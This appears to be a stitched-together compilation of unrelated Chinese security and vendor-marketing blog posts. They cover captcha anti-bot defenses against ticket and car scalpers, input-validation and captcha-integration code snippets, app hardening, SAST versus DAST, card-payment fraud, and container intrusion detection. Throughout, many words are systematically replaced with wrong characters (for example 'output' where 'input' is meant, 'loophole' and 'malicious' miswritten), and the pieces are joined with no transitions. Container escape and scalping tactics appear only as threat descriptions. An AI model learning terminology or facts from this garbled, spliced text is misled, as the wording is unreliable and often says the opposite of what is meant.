前言2023年“央视315晚会”曝光了一些网络平台明火执仗地售卖直播水军，人气、播放量、点赞、评论等等，均可24小时自助下单，达成衬托直播间氛围的目标。依据报道，某公司推出额云控系统，一台手机，可同时操控200到20000台手机。为了让水军看起来更像实在用户，该云控系统还能当时设定批次、进入工夫以及不同的发言内容等进入直播间，甚至还能够去竞争对手的直播间，主动投诉甚至争光。 这曾经是一条成熟的黑灰产。防备黑灰产须要多种措施，其中之一是在代码中采取一些措施来减少安全性。以下是一些可供参考的代码实际，以避免黑灰产行为。 具体代码1.输出验证在所有的输出字段中包含表单、URL 和 cookies 中都必须进行数据验证，以确保输出的数据是非法的，不蕴含特殊字符或恶意代码。在输出验证过程中，能够应用正则表达式、过滤器、参数化查问等技术。 输出验证是Web应用程序安全性的重要组成部分之一，它能够避免攻击者通过输出歹意数据来执行各种攻打，如XSS和SQL注入攻打。上面是一些输出验证的代码示例：1）验证用户名和明码 // 应用正则表达式验证用户名和明码function validateUsername(username) { return /^[a-zA-Z0-9_-]{3,16}$/.test(username);}function validatePassword(password) { return /^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{6,20}$/.test(password);}// 示例代码if (!validateUsername(username)) { alert('用户名不非法！');}if (!validatePassword(password)) { alert('明码必须蕴含至多一个数字、一个小写字母和一个大写字母，长度为6到20个字符！');}2）过滤特殊字符 // 过滤输出中的特殊字符function filterInput(input) { return input.replace(/(<([^>]+)>)/ig, '').replace(/([^\w\s\d])/gi, '');}// 示例代码var userInput = filterInput($('#inputField').val());3）参数化查问 // 参数化查问function getUserById(userId) { return new Promise((resolve, reject) => { const query = 'SELECT * FROM users WHERE id = ?'; connection.query(query, [userId], (error, results, fields) => { if (error) { reject(error); } else { resolve(results[0]); } }); });}// 示例代码const userId = 123;getUserById(userId).then(user => { console.log(user);}).catch(error => { console.error(error);});输出验证是Web应用程序安全性的重要组成部分之一，它能够确保用户输出的数据是非法的，不蕴含特殊字符或恶意代码，从而避免黑灰产行为。下面的代码示例能够帮忙开发人员进行输出验证，但须要依据具体情况进行批改和欠缺。 ...

本打算畅快薅一把羊毛，没曾想遇到领有风控能力的验证码。 从早上6点多开始，王宇开始用批量抢购软件登录东风雪铁龙小程序，筹备抢那款热门C6车，却始终未胜利。不是被被零碎拦挡，就是无奈通过验证。他批改了好屡次设施参数信息，更换了好几批IP地址，甚至启用了一批从未应用过新账号，却仍旧被小程序验证码拦挡正告。 以至于，王宇认为东风汽车封禁本人所在地的网络IP。还特意用实在的号码登录小程序验证，却发现能够胜利登录失常下单。 “真邪门了，白忙活一天”，王宇怄气得骂了几句。 汽车大提价，黑灰产牟利欢3月初，湖北省政府联结车企与经销商，对东风旗下的诸多自主与合资品牌发展为期1个月的惊人补贴。其中，最受关注的一款车型为东风雪铁龙C6。一台雪铁龙C6共创版，指导价21.19万元左右。其中，厂商优惠4.5万元，政府补贴4.5万元，累计优惠9万元，裸车价仅为12.19万元左右，是东风系旗下品牌中提价幅度最大的一款车型。 各地消费者都是直奔雪铁龙C6而来，在泛滥消费者扑向线下4S店的同时，像王宇一样的抢购者却将眼光转向东风雪铁龙的在线销售平台——东风雪铁龙小程序。 王宇原打算抢购100-200购车名额，而后别离加价3000-5000元，在那些二手平台和社群里转售给购车的真正消费者，这样就可能轻松稳赚几十万元人民币。像王宇这样，应用软件程序参加东风雪铁龙在线抢购的黑灰产还有很多。他们不仅扑向东风雪铁龙小程序，东风标致小程序也成为抢购的重点。 顶象进攻云业务平安情报中心监测发现，3月1日起，东风雪铁龙小程序、东风标致索肖社区小程序的验证码申请量大增。顶象无感验证的危险拦挡量，从每日的百分之十几猛增到百分之三四十，甚至一度达到65%。也就是说，每天异样行为的账号、欺诈行为账号注册登录一度达到65%。 因为东风雪铁龙小程序、东风标致小程序配置了领有风控能力的无感验证验证码，导致王宇应用的批量账号无奈胜利登录，也就无奈实现指标车型的抢购。 汽车电商面临危险有哪些特色？汽车电商业务中波及到的优惠零碎、客户零碎等，规定应用上相互重叠破绽很多，业务危险点多，账户、订单等各零碎均有可能呈现破绽，单点防控难度大。黑灰产手握大量账号，个体行为非法、群体非法，辨认难度大。攻击者中既有不良用户，又有业余黑灰产，还有可能是歹意同行。业余工具不断更新，新伎俩层出不穷，反抗进攻难度大。 1、在线购物业务杂、规定繁冗、破绽多。破绽是威逼的暴发源头，无论是病毒攻打还是黑客入侵大多是基于破绽，软件破绽、接口破绽、治理破绽等等。并且，电商业务中波及到的优惠零碎、客户零碎等，规定应用上相互重叠破绽很多，业务危险点多，账户、订单等各零碎均有可能呈现破绽，单点防控难度大。 2、攻击者规模宏大、业余水平高。黑灰产彼此分工明确、单干严密、协同作案，造成一条残缺的产业链。他们相熟各项业务流程，理解企业的需要、风控规定及业务破绽，可能娴熟地使用挪动互联网、云计算、人工智能等新技术进行业务欺诈操作。他们可能纯熟利用自动化、智能化各类新技术，一直开发和优化各类攻打工具。 3、欺诈伎俩复杂多变，单点防护生效。黑灰产手握大量账号，个体行为非法、群体非法，辨认难度大。攻击者中既有不良用户，又有业余黑灰产，还有可能是歹意同行。同时，秒拨IP、模拟器等业余工具不断更新，新伎俩层出不穷，反抗难度大。而且业务欺诈覆盖范围广，跨界、跨区域穿插特色显著，危险传播速度快，涉众广、逐利性强，当某个平台的业务上呈现该危险，会被迅速复制到其余业务平台上。以往业务危险传染性以天计算，当初以分钟计算，传染性流传性大增。  4、攻打起源简单，辨认和进攻难度大。相较于个体欺诈，团伙欺诈行为更难侦测和辨认，传统的反欺诈工具无奈从全局视角洞察欺诈危险。业务危险欺诈一直变动，伎俩更迭疾速，新攻打伎俩对既有的防控措施进行了调整甚至免疫，传统措施不能及时对新危险进行辨认和预警。而且网购平台很多业务平安流程上很容易互相矛盾，甚至互相打架， 一旦呈现误判，将间接影响订单交易和平台经营。 验证码如何防备欺诈账户登录顶象无感验证以进攻云为外围，集13种验证形式，多种防控策略，以智能验证码服务、验证决策引擎服务、设施指纹服务、人机模型服务为一体的云端交互平安验证零碎。其会集了4380条危险策略、112类危险情报、笼罩24个行业、118种危险类型，防控精准度>99.9%，1天内便可实现从危险到情报的转化，行业危险感知能力实力增强，同时反对平安用户无感通过，实时反抗处理能力更是缩减至60s内。 集成行为算法，加强操作爱护。无感验证通过行为轨迹模型检测来进行辨认，如鼠标在页面内的滑动轨迹、键盘的敲击速率、滑动验证码的滑动轨迹、速率、按钮点击等。同时，它应用孤立森林（Isolation Forest，一种异样检测算法）提出Isolation概念，将异样数据从既有数据分布中孤立，用以实现异样检测的目标，不仅能够无效地不仅晋升验证码对机器行为、歹意行为的辨认能力，更能够加强操作的爱护。 集成验证模拟，实现被动反抗。无感验证通过图片乱序切条、图片更新定时加工、图片变异等技术，联合关联性检测进行防备，通过内置规定和策略，判断相干关联性，如同一设施关联性、同一IP关联性、滑动失败关联性、验证次数关联性等，无效辨认短时间内异样关联性。尤其是集成的验证魔方，10s内实现配，60s即可失效，可实现疾速攻防反抗。 内嵌乱序传输，无效防劫持。无感验证在数据传输环节已内置“乱序切图传输“性能，可将背景图片进行乱序切割后流传。 动静加解密，进攻已知攻打。无感验证专有动静加解密混同算法，可能对JS代码进行混同压缩，并定时自动化更新算法，主动变更数据加密，实现验证码校验的疾速主动迭代，大幅加强破解难度。 人机训练模型，反抗未知威逼。无感验证集成实时流计算及场景策略联合机器学习训练的人机模型、历史数据的关联剖析，通过图形算法和AI模型，对用户产生的行为轨迹数据进行机器学习建模，联合拜访频率、地理位置、历史记录等多个维度信息，疾速、精确的返回人机断定后果，抵挡程序的自动识别，抵制新技术的攻打。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

环境要求兼容IE8+，Chrome，Firefox，360浏览器，QQ浏览器等支流浏览器。 获取appId请先进入顶象控制台中的“利用治理”或“利用配置”模块，并下图指引地位找到appId。 获取apiServer在菜单栏无感验证->利用治理页面左上角显示“接入域名”即为前端接入apiServer，如下图所示： 引入 JS<script src="https://cdn.dingxiang-inc.com/ctu-group/captcha-ui/v5/index.js" crossorigin="anonymous" id="dx-captcha-script"></script>留神：因为验证码 JS 会不定期降级更新，请间接援用顶象 CDN 上的资源，以便及时取得最新平安防护，不要将 JS 文件下载到本人服务器应用。 初始化以下别离列举Javascript、React、Vue的初始化接入示例代码： Javascript 示例假如页面上有一个 <div id="c1"></div>，则能够像上面这样初始化验证码。var myCaptcha = _dx.Captcha(document.getElementById('c1'), { appId: 'appId', //appId，在控制台利用治理或利用配置模块获取 apiServer: 'https://xxx.dingxiang-inc.com', // apiServer域名地址在控制台页面->无感验证->利用管页面左上角获取，必须填写残缺包含https://。 success: function (token) { // console.log('token:', token) // 获取验证码token，用于后端校验，留神获取token若是sl结尾的字符串，则是前端网络不通生成的降级token,请查看前端网络及apiServer地址。 }})初始化实现后，验证码组件会被插入到<div id="c1"></div> 中。 React 示例假如页面上有一个 <div id="demo"></div>，则能够像上面这样初始化验证码： // 类组件应用componentDidMountuseEffect(() => { _dx.Captcha(document.getElementById('demo'), { appId: 'appId', //appId，在控制台利用治理或利用配置模块获取 apiServer: 'https://xxx.dingxiang-inc.com', // apiServer域名地址在控制台页面->无感验证->利用管页面左上角获取，必须填写残缺包含https://。 success: token => { // 获取验证码token，用于后端校验，留神获取token若是sl结尾的字符串，则是前端网络不通生成的降级token,请查看前端网络及apiServer地址。 console.log(token); } });}, [])可点击查看 React残缺示例代码，初始化实现后，验证码组件会被插入到 <div id="demo"></div>中。 Vue 示例假如页面上有一个 <div ref="demo"></div>，则能够像上面这样初始化验证码： ...

“以前一份公文从印发到传阅，少则三五天，多则半个月，当初有了掌上通，当天的文件当天能够解决，效率显著进步。”慈溪农村商业银行办公室负责传递文件的人员快乐地说。 慈溪农村商业银行借助数字化，提供差异化和特色化的产品服务，进步业务的精密度，更进一步晋升治理服务，优化外部运行效率。 挪动办公App晋升工作效率慈溪农村商业银行领有员工1300余人，下设1家营业部，25家一级支行，2家二级支行，100家分理处，存贷款总额超1300亿元，经营规模、网点设置、资金实力均居慈溪市银行业首位。 随着银行资产、业务规模不断扩大，遍布全市的100多个营业网点物理间隔扩散，员工为报批相干工作须常常往返总行与分行，用户银行往昔多采纳线下办公模式解决行政事务。此外，因为农商行业务大多在农村、城乡接合部，网点散布广、配置人员多、治理半径大、客户档次简单等多种起因造成经营老本较高。原有的办公零碎性能繁多，曾经不能满足银行的办公需要，逐步涌现出公文收发难标准、业务信息难汇总的治理难题。 为晋升治理服务，优化外部运行效率，慈溪农村商业银行搭建了一套外部办公App“和美掌上通”，全面助力全行经营与办公提效增速。该App充分利用电子信息技术和网络技术，涵盖公文、用印、我的项目、设施、合同、销假、云报表等治理，突破工夫、空间限度，放慢了外部文件与审批单的流转。 “和美掌上通”App上线后，改革传统的办公形式，由纸质化办公向以电子化解决为主的无纸化办公转变，进步了办公效率，标准了办公程序，实现部门之间、机关与网点间的办公自动化、网络化和信息共享。进一步提高了全行工作效率，无效解决了文件传送与数据报送不及时、事项审批耗时、办公老本低等诸多问题。 为进一步保障“和美掌上通”App办公信息安全，慈溪农村商业银行引入顶象App加固。顶象App加固能无效进攻内存注入、Hook、调试、注入、多开、内存Dump、模拟器、二次打包和日志泄露等攻打威逼，避免App遭入侵、篡改、破解、二次打包等歹意侵害，不仅独有“蜜罐”性能、爱护Android 16种数据和文件，提供7种加密模式，率先反对对iOS免源码加固，更并可能对密钥存储文件、配置类文件的进行加密，保障源代码和数据安全，从而为“和美掌上通”App提供建设运行时危险的监测、预警、阻断和溯源平安体系。 截至目前，顶象曾经服务银联、中国银行、交通银行、民生银行、安全银行、江苏银行、贵州银行等100多家金融机构。 数字化助力业务飞速发展慈溪农村商业银行保持“姓农、姓小、姓土”外围定位，秉承“诚待客，严律己”的外围价值观，践行“做小、做农，做散、做短，做实、做优，做精、做强”的“八做”战略方针，继续深耕农村金融市场，加大信贷无效投入，深入普惠金融工程，助力“最多跑一次”，服务“农村振兴”策略，强化内控治理，深植和美企业文化，致力成为做业务最实、与民企最亲、离百姓最近的银行，在新批发和数字转型中有所作为，义不容辞地当好农村金融服务主力军。 通过发展“一企一群一策”服务，即建设一家企业、一个微信联动群、一项可享受优惠政策的清单，慈溪农村商业银行随时对接客户融资需要，解决企业流动资金艰难。例如，慈溪市普瑞箱包有限公司以向欧美市场进口无纺布、牛津布制品为次要业务，受疫情影响，外国客户纷纷要求延期发货，出口量下滑导致企业资金链缓和，慈溪农村商业银行被动对接企业需要，迅速办理4笔融资，提供金额为51.2万美元专项贷款，解决了企业的当务之急。 通过推出“线上预审”+“单证速递”零接触交单攻略，并安顿信用证业余人员全勤值班审核单据，慈溪农村商业银行跑出交单“加速度”。例如，慈溪市威玛电子科技有限公司有一笔147多万美元的信用证单据，按失常流程已无奈发出款项，慈溪农村商业银行急事急办，仅用15分钟便实现面函缮制等手续，当天办结单据海内邮寄，顺利完成款项收汇，为企业防止了损失。 推出“和美贷动青春”“青农贷”等特色守业贷款产品，慈溪农村商业银行为园区内优良涉农守业青年、优质涉农创业项目提供创业资金。例如，胡佳玲是一名当地来慈溪守业的“80后”大学生，从农商行取得一笔50万元的青年守业贷款后，她承包了50余亩土地创立青庭花园我的项目，目前已造成集郊游娱乐、休闲采摘、体育健身等性能于一体的农业生态公园，还引入园林设计革新、盆景造型等经营项目。 与当地经信局、金融倒退服务中心等单干，慈溪农村商业银行深刻施行“慈新打算”——专精特新企业综合金融服务计划，设立专项资金100亿元，深入金融服务，构建反对“专精特新”企业倒退的政策体系，独特促成“专精特新”、各行业当先企业产业精细化晋升和高质量倒退。慈溪农村商业银行还建设标准化“信用评分模型”，精准计量企业信用等级、授信额度等相干数据，最大限度扩充企业用信额度，对国家级专精特新“小伟人”企业和单项冠军企业最高可达3000万元，宁波市单项冠军培养企业最高可达2000万元，宁波市专精特新入库培养企业最高可达1000万元。截至2023年1月末，慈溪农村商业银行信贷反对119家专精特新名单企业，贷款余额18.11亿元，比年初新增1.02亿元。 慈溪农村商业银行将全面推动普惠小微服务战略规划，全力服务笼罩全市19万市场主体，减速构筑“全方位成体系以人为外围的普惠金融工程”，扎实助推宁波制造业高质量倒退。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

动态应用程序平安测试（SAST）和动静应用程序平安测试（DAST）都有助于确保您的软件平安并防备破绽，这使得DevSecOps过程更容易。本篇文章解释了SAST与DAST之间的区别，帮忙您更好地理解它们别离应该在何时应用。 SAST与DAST的次要差别这两种工具都是用于辨认软件安全漏洞的，然而，它们的工作形式十分不同。每种办法都有不同的长处，能够找到不同类型的破绽，具体取决于您处于软件开发过程中什么阶段。在现实的状况下，您会心愿在平安测试工具包中同时应用这两种工具，并理解如何最好地独自和联合应用它们。 动态应用程序平安测试（SAST）通常在软件开发过程的晚期检测安全漏洞，并能够精确定位这些问题的确切地位，提供无关破绽重大水平的详细信息。这为开发人员节俭了大量工夫，把他们从手动查找、修复问题的麻烦中援救进去。 动静应用程序平安测试（DAST）通常在开发过程的前期进行，剖析处于动静（或运行）状态的应用程序。这种类型的测试可帮忙开发人员从用户的角度理解应用程序如何运行，而不须要理解软件的工作原理及其背地的编程理念。在不同的利用程序运行时，DAST大范畴地测试输出和输入，动静地检测它们的破绽。 现实状况下，SAST和DAST应该一起应用，以便在整个软件开发生命周期（SDLC）中笼罩尽可能多的破绽。为了让您理解何时以及如何将每种测试方法的作用施展到最大，以下将论述SAST与DAST之间最显著的差别。 何时应该应用SAST而不是DAST您须要理解： 白盒平安测试 SAST通常被称为白盒平安测试，这意味着开发人员能够拜访软件的底层框架、设计和施行状况。SAST工具会从内到外测试软件，帮忙开发人员打消对于应用行业标准的偏见，并找出您在可预测故障条件之外可能未思考到的问题。 预编码签入查看 作为继续集成（CI）最佳实际的一部分，在提交代码之前就执行预编码签入让您能够共享和接管反馈，以及在SDLC晚期继续测试更改。当在集成开发环境中运行预编码签入查看时，SAST工具可能自动化执行此过程，疾速查找出bug，以便轻松修复它们，并放弃高质量的代码。 Jenkins流水线品质门限查看 在 流水线中构建品质门限，确保在您有机会解决这些问题之前，重要故障不会先进入下一个步骤。您能够增加动态剖析作为品质门限查看标记的一部分，并应用SAST工具来帮忙您确定品质门限的规范，以及查找导致品质门限失败的谬误。 夜间扫描 SAST能够在软件开发的所有阶段执行，包含服务器夜间构建。夜间动态剖析扫描是继续监控代码运行情况的好办法，当您来到办公桌时，更彻底的SAST剖析能够辨认您可能错过的破绽，让您有工夫在工作工夫修复它们。 必须有源代码 这种类型的工具不须要您运行软件来剖析其破绽。相同，它会剖析您的源代码、字节码和二进制文件，无需执行任何内容，还将提供最疾速反馈且只须要起码的工作量。 在开发晚期发现破绽，修复老本较低 这种类型的工具可能在您写代码时扫描它。这有助于确保尽快辨认安全漏洞和编码谬误，也使得解决这些问题更容易、更快、老本更低。 无奈辨认与工夫和环境相干的问题 因为此类工具扫描的是动态代码，因而它无奈辨认与工夫和环境相干的破绽。 通常反对所有类型的软件 您能够应用这种类型的工具来剖析大多数类型的软件，包含嵌入式软件、企业应用程序、挪动应用程序、Web应用程序和Web服务。△ SAST与DAST之间的差别 何时应用DAST而不是SAST以下是您须要理解的内容： 黑盒平安测试 与SAST相同，DAST通常被称为黑盒平安测试，从外到内测试应用程序。您无权拜访软件的底层框架、设计和施行状况，因而外部细节是含糊的。这种测试方法能够帮忙您理解不良行为者可能的入侵形式。 须要一个运行中的应用程序 DAST工具要求您运行软件来剖析其破绽。 在开发前期发现破绽，修复老本更高 DAST工具只剖析能够编译和运行的软件，这意味着它只能在开发前期辨认破绽。这使得修复谬误变得更加艰难、耗时，因而老本更高。 可能辨认与工夫和环境相干的问题 因为DAST工具应用动态分析来查看您的软件，因而它可能辨认与工夫和环境相干的问题。 SAST的劣势是什么？以下是这类工具的次要长处： 通过查找国内公认的平安、防备和品质编码标准已知破绽的形式来发现问题；晚期缺点检测和修复，从而升高修复老本；左移办法——随时随地提供剖析，包含开发人员桌面和 CI/CD流水线；易于自动化、可扩大并主动提供最高级别的代码覆盖率；反馈速度很快，并提供破绽的确切地位及其起因。DAST的劣势是什么？以下是这类工具的次要长处： 利用程序运行时，在整个零碎环境中，对其进行整体剖析；“透视”应用程序外部，动态分析执行逻辑和实时数据；独立于语言和源代码；查看内存耗费和资源应用状况；尝试从内部破解加密算法；验证权限以确保隔离权限级别；查看跨站点脚本、SQL注入和Cookie操作；测试第三方界面中的破绽；了解参数和函数调用；记录应用程序执行，用于预先测试失败剖析；捕捉硬应用程序故障；基于脚本、无人参加的动态分析。将两者联合用于您的平安打算作为无效平安打算的一部分，SAST和DAST应该一起应用，因为它们可能辨认对方可能无奈辨认的破绽。 SAST在开发晚期测试源代码。越来越多的企业正在将SAST测试整合到其CI和CD流水线中，以便他们尽早并常常发现源代码破绽。 DAST无法访问源代码，而是在软件曾经运行时对其进行测试，发现歹意行为者可能试图利用的安全漏洞。 然而，没有哪种测试方法在实质上比另一种更好。为了进行全面的应用程序平安测试，两者都是必须的。应用SAST和DAST自动化工具将这两种测试方法集成到您的流水线中，有助于确保代码平安，而不会就义代码品质或交付工夫。 应用Perforce SAST工具Klocwork，确保软件平安和我的项目胜利Perforce提供用于C、C++、C#、Java、JavaScript、Python和Kotlin的SAST工具Klocwork，能够帮忙您在晚期辨认平安、品质和可靠性问题，强制恪守编码标准，确保代码免受安全漏洞的影响，且升高修复老本。Klocwork的设计易于扩大到任何规模的我的项目，进步您在编写代码时主动进行源代码剖析的能力。 文章起源：http://bit.ly/3J5hVRh

接着上篇文章：【如何给iOS APP加固】之查看代码破绽 第四章【附代码】 7.应用HTTPS如果应用程序须要与服务器通信，应该应用HTTPS协定进行通信。HTTPS能够加密通信数据，避免黑客窃取通信数据。 上面是一个应用HTTPS加密的代码示例： // 创立一个URL对象，这里是一个示例URLguard let url = URL(string: "https://www.example.com/api/data") else { fatalError("Invalid URL")}// 创立一个URL申请对象，并将其设置为应用HTTPS协定var request = URLRequest(url: url)request.setValue("application/json", forHTTPHeaderField: "Content-Type")request.httpMethod = "GET"request.timeoutInterval = 30// 创立URLSession对象，并应用默认配置let session = URLSession.shared// 应用URLSession对象发出请求let task = session.dataTask(with: request) { (data, response, error) in // 解决响应 if let error = error { print("Error: \(error)") } else if let data = data, let response = response as? HTTPURLResponse { print("Response status code: \(response.statusCode)") print("Response data: \(String(data: data, encoding: .utf8) ?? "")") }}// 启动工作task.resume()在这个示例中，咱们创立了一个应用HTTPS协定的URL对象，并将其用于创立一个URL申请对象。而后，咱们应用URLSession对象发出请求，并在响应中解决数据。因为咱们应用了HTTPS协定，所有传输的数据都会被加密，从而确保通信是平安的。 ...

跨境电商次要是通过电子商务平台进行交易，在平台上实现领取结算，并通过国内物流将商品送达买方，从而实现跨国批发交易。与传统贸易相比，跨境电商存在交易链条更短、回款周期更快、数据及时通明等劣势。商务部数据显示，2022年全年跨境电商进出口额2.11万亿元，同比增长9.8%。其中，进口1.55万亿元，同比增长11.7%。 我国跨境电商市场参与者泛滥，品牌力、渠道力和经营力将成为掂量跨境电商厂商竞争力的外围指标。精准营销实现品牌形象塑造、多元化经营扩散平台危险、精细化经营助力降本增效，将成为同质化竞争加剧背景下跨境电商企业解围的要害。据埃森哲报告显示，曾经出海的企业中，大企业占63%，中小企业占37%。打算出海的企业中，大企业占35%，中小企业占65%，中小企业出海锋芒毕露。 跨境电商促成了世界经济贸易的普惠共赢，带动了流通基础设施现代化建设，推动了生产和流通的深度交融。同时商家也面临多重欺诈危险，尤其是在跨境领取上遭逢的危险更为简单。 商家遭逢到的两类跨境领取欺诈国外尤其是美国的信用卡业务呈现十分早，倒退的也很欠缺，信用卡领取比重也十分高。在跨境电商服务中均为无卡交易，消费者购买商品后，只须要输出括卡号、有效期，三位CVV等信息即可实现付款，无需明码。该类领取会晋升订单交易成功率，毛病就是歹意拒付、欺诈交易的危险比拟高。 第一类，盗卡交易欺诈。欺诈者购买商品后，应用盗取的卡片信息进行领取。当失主在发现自己的卡片被盗刷后会致电银行撤销交易，并对交易进行拒付。而此时商家已将商品发送给购买者，由此面临钱货两空的情景。 第二类，退款领取欺诈。欺诈者购买且收到商品后，却以商品未收到或商品损坏为由向银行提出异议，启动退款流程，商家同样面临钱货两空的情景。 无论是盗卡交易欺诈还是退款领取欺诈，都会给商家带来钱货两空的损失。而且当拒付欺诈率达到肯定阈值时，商家还会蒙受银行的处罚，给商户信用带来更大损失。严重者，还会导致商家应用的第三方领取账号解冻甚至封号，这意味着商家无奈再利用这个渠道进行任何跨境销售，这将间接导致品牌出海碰壁甚至威逼整个公司的生存。 商家应如何保障订单安全性？应答日趋简单的跨境领取环境，商家须要制订松紧切当的风控防备机制，优化购物用户的身份验证机制，做好领取行为的监控，部署业余的风控产品，并做好各种应答预案，防备可能存在的交易欺诈危险。 增强异样订单危险辨认对于同一消费者短时间反复下单购买同一产品、多个订单的收货地址雷同却应用不同的卡领取的购买者、平时生产金额小忽然生产金购大、购买后重复督促尽快发货、购买者应用的是外国性用卡收货地址却在另外一个国家、用类似的信用卡号屡次交易、是同一张卡或是多张卡交易账但收货地址不同、同一个IP地址下应用了多张卡进行交易等等异样行为保持警惕。能够要求购买者提供信用卡对账单、对应的持卡人驾照复印件、电话等身份证明，或者进行电话核查等等，以便于进一步核验购买者身份的真实性。 首先，认真履行责任。消费者下单后，商家确认送货地址和账单地址统一，按时交付货品、追踪物流信息，并与消费者放弃沟通。 其次，关注异样购买者。建设欺诈者黑名单，将欺诈或歹意拒付的订单记录在案，在后续交易中，一旦发现雷同的购买信息，则间接拦挡。 此外，明确退货规定。简化退货流程，制订明确清晰的退货规定，最大限度封堵欺诈者的套利门路。 加强领取平安保障开启领取的3D通道，多一步验证步骤，缩小欺诈的危险。所谓3D通道可就是领取时须要三方认证。3D简略了解就是3方的意思：收单行、发卡行和卡组织。 开启3D验证领取后，在电商领取页面抉择银行卡领取后，收单行会承接该指令，而后传递给卡组织，卡组织再传递给发卡行。此时浏览器就会弹出发卡行的网站。消费者输出卡号、CVV2、信用卡过期工夫以及设置的3D平安验证明码来实现验证，也可能在这个页面通过手机短信来实现认证。 3D验证服务是由Visa、MasterCard、JCB等国内发卡组织，所推出的网路平安认证服务，在应用信用卡线上购物之前，再输出一组自行设定的明码，来确保持卡人自己在进行网上交易。 部署业余反欺诈产品单纯依附商家一单单去人工判断欺诈危险的话，效率非常低，因而部署一个业余的业务平安服务很重要。顶象风控系统深度剖析消费者画像，进行多维度、深层次剖析和大数据匹配精准辨认出异样交易，帮忙危险审核规定制度，助力跨境卖家发明衰弱平安的交易环境。 基于以上跨境电商领取欺诈特点，顶象倡议： 1、通过内部手机号危险评分、IP危险库、代理邮箱检测等，及时排查歹意欺诈账户。 2、检测客户端（或浏览器）的设施指纹是否非法，是否存在注入、hook、模拟器，及时发现批量舞弊软件危险。 3、针对同设施（或同用户）高频下单、同设施关联大量账号、同收货地关联大量订单等异样行为进行检测和拦挡，对于存在异样行为的账号进行标注，积淀到相应的名单库，后续进行重点排查。 4、基于风控数据以及业务的积淀数据，对用户下单这一场景进行建模，模型的输入能够间接在风控策略中应用，开掘潜在危险，进一步晋升平安保障。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

关注【融云 RongCloud】，理解协同办公平台更多干货。

近日，顶象收到香港特区政府资讯科技总监办公室中标告诉。顶象无感验证中标GovHK香港政府一站通网站（http://www.gov.hk）某数字化我的项目，将为该我的项目提供平安验证服务。 GovHK香港政府一站通网站是香港特别行政区政府的官方网站，为本港居民、非本港居民、商务贸易及不同的社会群体提供一系列政府资讯和服务。例如：“入境事务”、“税务及应课税品"、“待业”等，让你毋庸知悉政府部门的分工及服务领域，亦可能寻获所需资讯和服务，也可利用网站的搜寻器找寻所需的资讯。 2016年，GovHK香港政府一站通网站采纳适应性网页设计，会主动调整内容，以合乎不同的屏幕大小、解析度及方向，为使用者提供最佳的观看和互动体验，让浏览更畅顺、应用更不便。2019年12月，GovHK香港政府一站通网站进一步优化，以懒人包的形式出现，让使用者更快捷地找到最热门的政府资讯及服务。网站先后取得互动媒体大奖、万维网推广协会奖、无障碍网页嘉许打算奖、无障碍优异网站等荣誉。 网站是人们获取信息的重要渠道，尤其与民生密切相关的电子政务服务是互联网信息服务的重要组成部分。很多政务网站的注册登录验证码，让老年人看不清、记不住，而且无奈拖动到指定地位，成为老年人应用政务服务的一道拦路虎。顶象此前公布的《验证码适老化白皮书》显示，数字化遍及的时代，日益宏大的老年人群体因不足对现代化科技的适应力而被迫成为“数字弱势群体”。 顶象无感验证集智能验证码服务、验证决策引擎服务、设施指纹服务、人机模型服务为一体的云端交互平安验证零碎，无感验证提供无感的交互操作，老年群体登录网站账号时，无感验证可能智能剖析与事后断定操作者是非法用户还是仿冒者，对于非法用户，免验证即通过；对于异样用户，依据潜在危险等级进行二次验证或间接拦挡，实现对老年人和非凡群体的无打搅。 无感验证对视觉验证码进行了大幅视觉优化，并提供语音验证码供选择，还反对键盘快捷键实现语音验证码的从新播放、切换等操作，让操作者抉择适宜的验证形式，为老年群体提供无打搅、无障碍的交互体验。 顶象已先后为最高法、人力资源部、教育部、商务部、国家税务总局、市场监管总局等多个政务平台提供平安验证及适老化解决方案。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

背景云原生技术在各大公司的落地热火朝天，研发模式和基础设施都产生了很大的变动，新的 Kubernetes 和容器技术正逐渐取代传统的物理机和虚拟机。在云原生架构的演变过程中咱们发现也带来了一些新的危险和挑战，包含容器网络安全、容器逃逸、镜像平安等多个方面。为保障业务上云平安，一方面是要剖析解决新的平安危险，另一方面须要放慢相应的平安根底建设。本文将介绍针对一些已知的危险点，如何应用 HIDS 来保障云原生环境的平安。 容器威逼起源Linux 内核提权：收集对写 exploit 有帮忙的信息，比方内核版本及安全漏洞，而后通过触发该破绽去执行特权代码，使得低权限用户晋升到 root 用户权限，最终管制整个零碎。容器逃逸：通过冲破 Namespace 的限度，将高权限的 Namespace 赋到 exploit 过程的 task_struct 中，这往往是因为 Docker 安全漏洞或配置不当导致的。Docker 其余 CVE：比方通过歹意镜像利用 Docker runc 在应用文件系统描述符时存在的破绽。 攻打过程：docker run 启动了被歹意批改的镜像宿主机 runc 被替换为恶意程序宿主机运行 docker run/exec 命令是触发执行恶意程序特权容器或 Capability 权限过大：配置不当导致容器内的过程实现 Linux 零碎权限晋升。检测伎俩基线检测用于检测局部非预期环境。云原生重点关注 Kubernetes 和 docker 的安全漏洞以及谬误配置两方面，原理就是查看软件版本是否被爆出过 CVE 破绽，并检测配置文件内的配置项是否有危险，蕴含危险的查看项及时让业务或运维通晓并修复。云原生相关检查项： 除此之外，还会查看容器及宿主机内其余的软件配置（Redis、MySQL、Tomcat 等）、弱口令、等保基线等。 入侵检测用于检测局部非预期逻辑。 入侵检测的第一步就是采集足够具体的数据其中包含： 文件的创立、读写、link、重命名等操作；网络的连贯、bind 等状态；过程对于 execve、setsid、prctl、ptrace、call_usermode 的调用；登录日志、SSH 日志；零碎已装置组件，RPM、PYPI 包等；crontab、port 详细信息。 对于过程监控的计划次要有以下几种： 计划Docker 兼容性开发难度数据准确性数据零碎侵入性connector定制 Docker个别存在内核拿到的 pid，在 /proc/ 下失落的状况无Audit定制 Docker个别同 connector弱，但依赖 AuditdEBPF定制 Docker中等准确中等，依赖内核版本 3.18 以上Hook（kernel module）定制高准确强Hook 的计划，对系统侵入性太高了，尤其是这种最底层做 Hook syscall 的做法，如果测试不充沛将可能导致劫难级的故障，主机大面积瘫痪。综合稳定性思考，HIDS 过程创立监控采纳 cn_proc 的计划，相比拟 Audit，对系统无侵入。但这种形式存在内核拿到的 pid，在 /proc/ 下失落的状况，因为很多过程启动后就立即隐没了，去读取 /proc/ 